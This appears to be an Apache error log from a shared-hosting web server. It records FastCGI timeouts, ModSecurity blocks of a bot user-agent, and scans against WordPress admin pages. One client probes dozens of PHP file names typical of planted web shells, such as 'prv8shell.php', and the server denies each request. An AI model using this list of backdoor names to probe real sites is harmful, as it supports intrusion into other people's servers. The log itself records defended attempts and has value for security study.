[Sun Mar 15 19:59:02.617811 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46374] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:59:24.220997 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:59:45.133796 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46878] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:00:06.135966 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47120] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:00:28.127435 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:00:49.125813 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47650] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:01:10.131373 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:01:31.125798 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:01:52.126805 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48362] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:02:14.121802 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48660] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:02:22.724784 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.228.16:36862] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc6fnbQATo66fKoS7wApgAAAMk"]
[Sun Mar 15 20:02:37.125829 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:02:58.064537 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49296] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:03:19.073051 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:03:40.069836 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49732] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:04:02.154725 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49994] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:04:24.104654 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:04:46.029820 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:05:07.133787 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:05:28.088742 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:05:50.126228 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51320] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:06:08.544210 2026] [access_compat:error] [pid 21946:tid 140411582465792] [client 141.98.11.23:64600] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/upgrade.php, referer: www.google.com
[Sun Mar 15 20:06:10.952728 2026] [access_compat:error] [pid 21806:tid 140411725141760] [client 141.98.11.23:49892] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 20:06:11.170730 2026] [access_compat:error] [pid 21946:tid 140411632822016] [client 141.98.11.23:64600] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 20:06:11.387920 2026] [access_compat:error] [pid 21806:tid 140411699963648] [client 141.98.11.23:49892] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: www.google.com
[Sun Mar 15 20:06:11.606292 2026] [access_compat:error] [pid 21946:tid 140411741927168] [client 141.98.11.23:64600] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-editor.php, referer: www.google.com
[Sun Mar 15 20:06:11.821337 2026] [access_compat:error] [pid 21806:tid 140411708356352] [client 141.98.11.23:49892] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/plugin-install.php, referer: www.google.com
[Sun Mar 15 20:06:12.038892 2026] [access_compat:error] [pid 21946:tid 140411624429312] [client 141.98.11.23:64600] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-editor.php, referer: www.google.com
[Sun Mar 15 20:06:12.122262 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:06:33.736962 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:06:55.033855 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:07:16.082372 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:07:17.122900 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.244.31:54312] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc7pbABkC4fWIHEf8GiqwAAAEE"]
[Sun Mar 15 20:07:37.123983 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:07:39.477914 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.228.16:43994] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc7u3bQATo66fKoS7wBRAAAAM4"]
[Sun Mar 15 20:08:00.086615 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:08:21.133842 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:08:43.125504 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53352] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:09:05.134360 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53618] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:09:26.114967 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53900] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:09:48.129818 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54230] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:10:09.131066 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:10:31.109975 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:10:53.130820 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55052] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:11:14.069835 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:11:35.985861 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:11:57.125084 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:12:19.117855 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:12:20.920119 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:47162] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc81NSswJuvopo3lOgdywAAAIo"]
[Sun Mar 15 20:12:40.141297 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:12:56.619715 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.228.16:57090] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc8-HbQATo66fKoS7wBpAAAAMI"]
[Sun Mar 15 20:13:02.125838 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:13:23.129809 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:13:25.194162 2026] [access_compat:error] [pid 21806:tid 140411624429312] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/gptsh.php
[Sun Mar 15 20:13:25.323583 2026] [access_compat:error] [pid 21806:tid 140411616036608] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wolv.php
[Sun Mar 15 20:13:25.452642 2026] [access_compat:error] [pid 21806:tid 140411741927168] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/lock.php
[Sun Mar 15 20:13:25.582074 2026] [access_compat:error] [pid 21806:tid 140411599251200] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/edorxrr.php
[Sun Mar 15 20:13:25.710272 2026] [access_compat:error] [pid 21806:tid 140411691570944] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ox.php
[Sun Mar 15 20:13:25.838821 2026] [access_compat:error] [pid 21806:tid 140411607643904] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/1754569357_be.php
[Sun Mar 15 20:13:25.968019 2026] [access_compat:error] [pid 21806:tid 140411582465792] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-kd4xalrg7m.php
[Sun Mar 15 20:13:26.097583 2026] [access_compat:error] [pid 21806:tid 140411674785536] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/hplfuns.php
[Sun Mar 15 20:13:26.226663 2026] [access_compat:error] [pid 21806:tid 140411666392832] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test2.php
[Sun Mar 15 20:13:26.355293 2026] [access_compat:error] [pid 21806:tid 140411716749056] [client 20.151.11.236:54790] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/cah.php
[Sun Mar 15 20:13:26.487412 2026] [access_compat:error] [pid 21806:tid 140411632822016] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/boltt.php
[Sun Mar 15 20:13:26.619580 2026] [access_compat:error] [pid 21806:tid 140411708356352] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/prv8shell.php
[Sun Mar 15 20:13:26.757549 2026] [access_compat:error] [pid 21806:tid 140411540502272] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/1100.php
[Sun Mar 15 20:13:26.887543 2026] [access_compat:error] [pid 21806:tid 140411699963648] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sc_1.php
[Sun Mar 15 20:13:27.015710 2026] [access_compat:error] [pid 21806:tid 140411590858496] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/1998.php
[Sun Mar 15 20:13:27.143696 2026] [access_compat:error] [pid 21806:tid 140411658000128] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wtiiy.php
[Sun Mar 15 20:13:27.271703 2026] [access_compat:error] [pid 21806:tid 140411574073088] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sxb.php
[Sun Mar 15 20:13:27.400890 2026] [access_compat:error] [pid 21806:tid 140411649607424] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-mter.php
[Sun Mar 15 20:13:27.528857 2026] [access_compat:error] [pid 21806:tid 140411565680384] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/inege.php
[Sun Mar 15 20:13:27.656773 2026] [access_compat:error] [pid 21806:tid 140411641214720] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/hc.php
[Sun Mar 15 20:13:27.784372 2026] [access_compat:error] [pid 21806:tid 140411548894976] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/aifa.php
[Sun Mar 15 20:13:43.199264 2026] [access_compat:error] [pid 11972:tid 140411725141760] [client 20.151.11.236:55034] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/yussef.php
[Sun Mar 15 20:13:43.328668 2026] [access_compat:error] [pid 21533:tid 140411691570944] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/0771dccd2958b85d48125d146d77e038akc.php
[Sun Mar 15 20:13:43.458717 2026] [access_compat:error] [pid 21533:tid 140411574073088] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/19.php
[Sun Mar 15 20:13:43.590266 2026] [access_compat:error] [pid 21533:tid 140411624429312] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/we-es-o.php
[Sun Mar 15 20:13:43.736056 2026] [access_compat:error] [pid 21533:tid 140411590858496] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bb5.php
[Sun Mar 15 20:13:43.865636 2026] [access_compat:error] [pid 21533:tid 140411649607424] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fe5.php
[Sun Mar 15 20:13:43.994818 2026] [access_compat:error] [pid 21533:tid 140411557287680] [client 20.151.11.236:55040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp11.php
[Sun Mar 15 20:13:46.126421 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:13:47.187216 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] [client 20.151.11.236:54922] AH01071: Got error 'Primary script unknown'
[Sun Mar 15 20:13:47.187877 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] [client 20.151.11.236:55040] AH01071: Got error 'Primary script unknown'
[Sun Mar 15 20:13:47.317629 2026] [access_compat:error] [pid 21806:tid 140411565680384] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/16.php
[Sun Mar 15 20:13:47.450289 2026] [access_compat:error] [pid 21806:tid 140411641214720] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bb.php
[Sun Mar 15 20:13:47.583483 2026] [access_compat:error] [pid 21806:tid 140411557287680] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ss.php
[Sun Mar 15 20:13:47.712348 2026] [access_compat:error] [pid 21806:tid 140411616036608] [client 20.151.11.236:54922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/h2.php
[Sun Mar 15 20:13:47.841646 2026] [access_compat:error] [pid 21946:tid 140411658000128] [client 20.151.11.236:55106] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-p2r3q9c8k4.php
[Sun Mar 15 20:13:47.973754 2026] [access_compat:error] [pid 21806:tid 140411607643904] [client 20.151.11.236:55110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ty.php
[Sun Mar 15 20:13:48.104165 2026] [access_compat:error] [pid 21806:tid 140411674785536] [client 20.151.11.236:55110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/albin.php
[Sun Mar 15 20:13:48.239254 2026] [access_compat:error] [pid 21806:tid 140411691570944] [client 20.151.11.236:55110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/utky.php
[Sun Mar 15 20:13:48.368365 2026] [access_compat:error] [pid 21806:tid 140411725141760] [client 20.151.11.236:55110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.php
[Sun Mar 15 20:13:48.498228 2026] [access_compat:error] [pid 21806:tid 140411716749056] [client 20.151.11.236:55110] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fsgdjkl.php
[Sun Mar 15 20:13:48.627621 2026] [access_compat:error] [pid 32654:tid 140411540502272] [client 20.151.11.236:55126] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/uuu.php
[Sun Mar 15 20:13:48.759585 2026] [access_compat:error] [pid 21805:tid 140411741927168] [client 20.151.11.236:55132] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/by.php
[Sun Mar 15 20:13:48.895065 2026] [access_compat:error] [pid 21805:tid 140411691570944] [client 20.151.11.236:55132] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sf.php
[Sun Mar 15 20:13:49.038794 2026] [access_compat:error] [pid 32654:tid 140411548894976] [client 20.151.11.236:55140] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/asw.php
[Sun Mar 15 20:13:49.179568 2026] [access_compat:error] [pid 11972:tid 140411574073088] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/eee.php
[Sun Mar 15 20:13:49.309550 2026] [access_compat:error] [pid 11972:tid 140411733534464] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/lp6.php
[Sun Mar 15 20:13:49.439350 2026] [access_compat:error] [pid 11972:tid 140411741927168] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/akses.php
[Sun Mar 15 20:13:49.568406 2026] [access_compat:error] [pid 11972:tid 140411624429312] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/no1.php
[Sun Mar 15 20:13:49.696942 2026] [access_compat:error] [pid 11972:tid 140411582465792] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/teee.php
[Sun Mar 15 20:13:49.826145 2026] [access_compat:error] [pid 11972:tid 140411716749056] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wo.php
[Sun Mar 15 20:13:49.961175 2026] [access_compat:error] [pid 11972:tid 140411557287680] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rithin.php
[Sun Mar 15 20:13:50.101076 2026] [access_compat:error] [pid 11972:tid 140411632822016] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/kk.php
[Sun Mar 15 20:13:50.230377 2026] [access_compat:error] [pid 11972:tid 140411683178240] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/path.php
[Sun Mar 15 20:13:50.360286 2026] [access_compat:error] [pid 11972:tid 140411590858496] [client 20.151.11.236:55142] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/cs.php
[Sun Mar 15 20:13:50.489458 2026] [access_compat:error] [pid 21533:tid 140411733534464] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/w2025.php
[Sun Mar 15 20:13:50.618450 2026] [access_compat:error] [pid 21533:tid 140411641214720] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/swallowable.php
[Sun Mar 15 20:13:50.770670 2026] [access_compat:error] [pid 21533:tid 140411658000128] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fvvff.php
[Sun Mar 15 20:13:50.900309 2026] [access_compat:error] [pid 21533:tid 140411540502272] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/a2.php
[Sun Mar 15 20:13:51.029555 2026] [access_compat:error] [pid 21533:tid 140411548894976] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sty.php
[Sun Mar 15 20:13:51.158484 2026] [access_compat:error] [pid 21533:tid 140411565680384] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/g.php
[Sun Mar 15 20:13:51.287296 2026] [access_compat:error] [pid 21533:tid 140411674785536] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pp.php
[Sun Mar 15 20:13:51.416071 2026] [access_compat:error] [pid 21533:tid 140411699963648] [client 20.151.11.236:55164] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sys.php
[Sun Mar 15 20:14:07.065928 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:14:29.126006 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:14:50.129812 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57508] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:15:11.144304 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:15:33.060016 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57900] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:15:55.129929 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:16:17.033853 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58394] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:16:38.122630 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:16:59.078572 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58970] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:17:20.079899 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:17:41.125810 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:17:43.450645 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.244.31:54080] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc-F7ABkC4fWIHEf8GjgQAAAFg"]
[Sun Mar 15 20:18:02.117074 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:18:18.967800 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.228.16:44002] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc-OtSswJuvopo3lOgebgAAAIk"]
[Sun Mar 15 20:18:24.045874 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:18:46.133851 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59938] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:19:09.088945 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 20:19:30.125829 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60386] AH01075: Error dispatching request to : (polling)
